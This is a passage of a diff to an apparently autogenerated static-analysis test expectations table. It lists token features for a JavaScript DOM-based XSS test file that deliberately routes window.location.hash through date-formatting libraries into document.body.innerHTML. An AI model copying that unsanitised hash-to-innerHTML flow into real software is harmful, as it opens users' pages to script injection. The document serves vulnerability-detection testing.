dateFnsFp.format()() | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:50 | dateFnsFp | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:50 | dateFnsFp | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:50 | dateFnsFp | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:50 | dateFnsFp | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:50 | dateFnsFp | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:57 | dateFnsFp.format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:57 | dateFnsFp.format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:57 | dateFnsFp.format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:57 | dateFnsFp.format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:57 | dateFnsFp.format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:63 | dateFns ... t(time) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:63 | dateFns ... t(time) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:63 | dateFns ... t(time) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:63 | dateFns ... t(time) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:63 | dateFns ... t(time) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:63 | exceptional return of dateFns ... t(time) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:63 | exceptional return of dateFns ... t(time) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:63 | exceptional return of dateFns ... t(time) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:63 | exceptional return of dateFns ... t(time) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:63 | exceptional return of dateFns ... t(time) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:70 | dateFns ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:70 | dateFns ... (taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:70 | dateFns ... (taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:70 | dateFns ... (taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:70 | dateFns ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:70 | dateFns ... (taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:70 | exceptional return of dateFns ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:70 | exceptional return of dateFns ... (taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:70 | exceptional return of dateFns ... (taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:70 | exceptional return of dateFns ... (taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:42:15:70 | exceptional return of dateFns ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:15:52:15:57 | format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:15:52:15:57 | format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:15:52:15:57 | format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:15:52:15:57 | format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:15:52:15:57 | format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:15:59:15:62 | time | CalleeFlexibleAccessPath | dateFnsFp.format | | autogenerated/Xss/DomBasedXss/dates.js:15:59:15:62 | time | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:15:59:15:62 | time | calleeImports | date-fns/fp | @@ -12962,12 +96957,79 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:15:65:15:69 | taint | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:15:65:15:69 | taint | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:15:65:15:69 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:12 | document | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:17 | document.body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:27 | documen ... nerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:69 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:69 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:69 | documen ... aint)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:69 | documen ... aint)}` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:5:16:69 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:14:16:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:14:16:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:16:14:16:17 | body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:14:16:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:14:16:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:19:16:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:19:16:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:16:19:16:27 | innerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:19:16:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:19:16:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:16:31:16:69 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:16:31:16:69 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:16:31:16:69 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:16:31:16:69 | `Time i ... aint)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:16:31:16:69 | `Time i ... aint)}` | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:16:31:16:69 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:32:16:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:32:16:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:16:32:16:39 | Time is | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:32:16:39 | Time is | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:32:16:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:32:16:39 | Time is | stringConcatenatedWith | -endpoint- moment().format() | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:47 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:47 | moment | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:47 | moment | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:47 | moment | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:47 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:53 | exceptional return of moment(time) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:53 | exceptional return of moment(time) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:53 | exceptional return of moment(time) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:53 | exceptional return of moment(time) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:53 | exceptional return of moment(time) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:53 | moment(time) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:53 | moment(time) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:53 | moment(time) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:53 | moment(time) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:53 | moment(time) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:60 | moment(time).format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:60 | moment(time).format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:60 | moment(time).format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:60 | moment(time).format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:60 | moment(time).format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:67 | exceptional return of moment( ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:67 | exceptional return of moment( ... (taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:67 | exceptional return of moment( ... (taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:67 | exceptional return of moment( ... (taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:67 | exceptional return of moment( ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:67 | moment( ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:67 | moment( ... (taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:67 | moment( ... (taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:67 | moment( ... (taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:67 | moment( ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:42:16:67 | moment( ... (taint) | stringConcatenatedWith | 'Time is ' -endpoint- | | autogenerated/Xss/DomBasedXss/dates.js:16:49:16:52 | time | CalleeFlexibleAccessPath | moment | | autogenerated/Xss/DomBasedXss/dates.js:16:49:16:52 | time | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:16:49:16:52 | time | calleeImports | moment | @@ -12976,6 +97038,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:16:49:16:52 | time | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:16:49:16:52 | time | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:16:49:16:52 | time | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:16:55:16:60 | format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:16:55:16:60 | format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:16:55:16:60 | format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:16:55:16:60 | format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:16:55:16:60 | format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:16:62:16:66 | taint | CalleeFlexibleAccessPath | moment().format | | autogenerated/Xss/DomBasedXss/dates.js:16:62:16:66 | taint | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:16:62:16:66 | taint | calleeImports | moment | @@ -12984,12 +97051,79 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:16:62:16:66 | taint | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:16:62:16:66 | taint | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:16:62:16:66 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:12 | document | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:17:5:17:17 | document.body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body 